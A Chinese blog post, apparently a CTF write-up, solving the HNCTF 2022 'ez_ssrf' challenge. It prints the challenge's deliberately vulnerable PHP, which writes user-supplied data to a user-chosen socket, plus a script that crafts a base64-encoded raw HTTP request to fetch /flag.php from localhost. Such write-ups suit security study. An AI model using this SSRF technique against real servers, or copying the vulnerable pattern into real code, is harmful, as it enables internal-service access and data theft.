[HNCTF 2022 WEEK2]ez_ssrf

发表于2023-07-18 | 更新于 2023-07-18 | 服务器端请求伪造

| 字数总计: 687 | 阅读时长: 1分钟 | 阅读量: 237

这篇文章距离最后更新已过430 天,如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

 <?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];

$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);
    while(!feof($data))
    {
        echo fgets($fp,128);
    }
    fclose($fp);
}

host=127.0.0.1&port=80
主要是data的构造
<?php
$ans= "GET /flag.php HTTP/1.1\r\n";
$ans .= "Host: 127.0.0.1\r\n";
$ans .= "Connection: close\r\n\r\n";
echo base64_encode($ans);
?>
直接自己写请求头然后编码好像没有\r，然后就一直400，最好还是用php脚本写。

作者: CHHHCHHOH

文章链接: http://chhhchhoh.cn/archives/202/

无标签

评论